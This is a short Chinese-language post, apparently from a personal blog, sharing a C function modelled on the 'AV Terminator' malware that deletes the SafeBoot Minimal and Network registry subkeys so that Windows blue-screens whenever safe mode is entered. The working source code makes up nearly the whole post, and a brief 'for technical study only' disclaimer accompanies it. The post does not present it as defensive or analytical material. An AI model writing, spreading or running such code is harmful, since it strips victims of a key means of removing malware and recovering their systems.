写了个破坏安全模式的函数
参考“AV终结者”写的一个小函数,直接删注册表的内容,方法很简单,不过网上很少看到有这方面的资料,恢复起来也容易:)
/* f 破坏安全模式,by:乱雪 2010-01-24 警告:仅用于技术学习使用,禁止使用到非法用途。 说明:直接通过删除注册表里关键子键达到无法进入安全模式的目的,一进安全模式就蓝屏,参考 AV 终结者的功能写的。 */ VOID KillSafeMode() { HKEY hKey[5]; ::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal",&hKey[1]); ::RegDeleteKey(hKey[1],"{4D36E967-E325-11CE-BFC1-08002BE10318}"); ::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network",&hKey[2]); ::RegDeleteKey(hKey[2],"{4D36E967-E325-11CE-BFC1-08002BE10318}"); ::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal",&hKey[3]); ::RegDeleteKey(hKey[3],"{4D36E967-E325-11CE-BFC1-08002BE10318}"); ::RegOpenKey(HKEY_LOCAL_MACHINE,"CurrentControlSet\\Control\\SafeBoot\\Network",&hKey[4]); ::RegDeleteKey(hKey[4],"{4D36E967-E325-11CE-BFC1-08002BE10318}"); ::RegCloseKey(hKey[1]); ::RegCloseKey(hKey[2]); ::RegCloseKey(hKey[3]); ::RegCloseKey(hKey[4]); }